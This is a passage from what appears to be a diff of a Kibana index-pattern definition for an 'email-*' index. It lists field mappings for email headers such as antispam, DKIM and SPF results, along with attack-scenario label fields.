s-office365-filtering-correlation-id-prvs.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-office365-filtering-correlation-id-prvs\"}}},{\"name\":\"x-ms-office365-filtering-correlation-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-office365-filtering-correlation-id\"}}},{\"name\":\"x-ms-oob-tlc-oobclassifiers\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-oob-tlc-oobclassifiers.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-oob-tlc-oobclassifiers\"}}},{\"name\":\"x-ms-publictraffictype\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-publictraffictype.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-publictraffictype\"}}},{\"name\":\"x-ms-tnef-correlator\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-tnef-correlator.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-tnef-correlator\"}}},{\"name\":\"x-ms-traffictypediagnostic\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-traffictypediagnostic.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-traffictypediagnostic\"}}},{\"name\":\"x-ms-userlastlogontime\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-userlastlogontime.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-userlastlogontime\"}}},{\"name\":\"x-msametadata\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-msametadata.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-msametadata\"}}},{\"name\":\"x-msapipeline\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-msapipeline.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-msapipeline\"}}},{\"name\":\"x-notifications\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-notifications.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-notifications\"}}},{\"name\":\"x-originating-ip\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-originating-ip.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-originating-ip\"}}},{\"name\":\"x-originatororg\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-originatororg.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-originatororg\"}}},{\"name\":\"x-received\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-received.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-received\"}}},{\"name\":\"x-sender-ip\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-sender-ip.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-sender-ip\"}}},{\"name\":\"x-sid-pra\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-sid-pra.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-sid-pra\"}}},{\"name\":\"x-sid-result\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-sid-result.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-sid-result\"}}}]", "timeFieldName": "@timestamp", "title": "email-*"}, "coreMigrationVersion": "7.16.2", "id": "email", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642152841336, 1866], "type": "index-pattern", "version": "1"} \ No newline at end of file +{"attributes": {"fields": "[{\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"@version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"@version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"@version\"}}},{\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_score\",\"type\":\"number\",\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"accept-language\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"accept-language.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"accept-language\"}}},{\"name\":\"arc-authentication-results\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"arc-authentication-results.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"arc-authentication-results\"}}},{\"name\":\"arc-message-signature\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"arc-message-signature.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"arc-message-signature\"}}},{\"name\":\"arc-seal\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"arc-seal.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"arc-seal\"}}},{\"name\":\"attackscenario\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"attackscenario.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"attackscenario\"}}},{\"name\":\"authentication-results\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"authentication-results-original\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"authentication-results-original.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"authentication-results-original\"}}},{\"name\":\"authentication-results.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"authentication-results\"}}},{\"name\":\"content-language\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"content-language.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"content-language\"}}},{\"name\":\"content-transfer-encoding\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"content-transfer-encoding.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"content-transfer-encoding\"}}},{\"name\":\"content-type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"content-type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"content-type\"}}},{\"name\":\"date\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"date.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"date\"}}},{\"name\":\"dkim-signature\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"dkim-signature.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"dkim-signature\"}}},{\"name\":\"emailfolder\",\"type\":\"string\",\"esTypes\":[\"text\",\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"emailfolder.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"emailfolder\"}}},{\"name\":\"feedback-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"feedback-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"feedback-id\"}}},{\"name\":\"from\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"from.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"from\"}}},{\"name\":\"in-reply-to\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"in-reply-to.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"in-reply-to\"}}},{\"name\":\"infra.attack_scenario\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"infra.log_type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"infralogtype\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"infralogtype.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"infralogtype\"}}},{\"name\":\"message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"message-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"message-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"message-id\"}}},{\"name\":\"message.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"message\"}}},{\"name\":\"mime-version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"mime-version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"mime-version\"}}},{\"name\":\"received\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"received-spf\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"received-spf.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"received-spf\"}}},{\"name\":\"received.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"received\"}}},{\"name\":\"references\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"references.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"references\"}}},{\"name\":\"return-path\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"return-path.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"return-path\"}}},{\"name\":\"subject\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"subject.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"subject\"}}},{\"name\":\"thread-index\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"thread-index.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"thread-index\"}}},{\"name\":\"thread-topic\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"thread-topic.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"thread-topic\"}}},{\"name\":\"to\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"to.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"to\"}}},{\"name\":\"x-account-notification-type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-account-notification-type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-account-notification-type\"}}},{\"name\":\"x-eopattributedmessage\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-eopattributedmessage.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-eopattributedmessage\"}}},{\"name\":\"x-eoptenantattributedmessage\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-eoptenantattributedmessage.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-eoptenantattributedmessage\"}}},{\"name\":\"x-forefront-antispam-report-untrusted\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-forefront-antispam-report-untrusted.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-forefront-antispam-report-untrusted\"}}},{\"name\":\"x-gm-message-state\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-gm-message-state.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-gm-message-state\"}}},{\"name\":\"x-google-dkim-signature\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-google-dkim-signature.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-google-dkim-signature\"}}},{\"name\":\"x-google-smtp-source\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-google-smtp-source.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-google-smtp-source\"}}},{\"name\":\"x-incomingheadercount\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-incomingheadercount.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-incomingheadercount\"}}},{\"name\":\"x-incomingtopheadermarker\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-incomingtopheadermarker.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-incomingtopheadermarker\"}}},{\"name\":\"x-message-delivery\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-message-delivery.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-message-delivery\"}}},{\"name\":\"x-message-info\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-message-info.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-message-info\"}}},{\"name\":\"x-microsoft-antispam\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-mailbox-delivery\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-mailbox-delivery.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-mailbox-delivery\"}}},{\"name\":\"x-microsoft-antispam-message-info\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-message-info-original\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-message-info-original.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-message-info-original\"}}},{\"name\":\"x-microsoft-antispam-message-info.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-message-info\"}}},{\"name\":\"x-microsoft-antispam-prvs\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-prvs.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-prvs\"}}},{\"name\":\"x-microsoft-antispam-untrusted\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-untrusted.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-untrusted\"}}},{\"name\":\"x-microsoft-antispam.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam\"}}},{\"name\":\"x-ms-exchange-antispam-messagedata\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-antispam-messagedata-original\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-antispam-messagedata-original.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-antispam-messagedata-original\"}}},{\"name\":\"x-ms-exchange-antispam-messagedata.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-antispam-message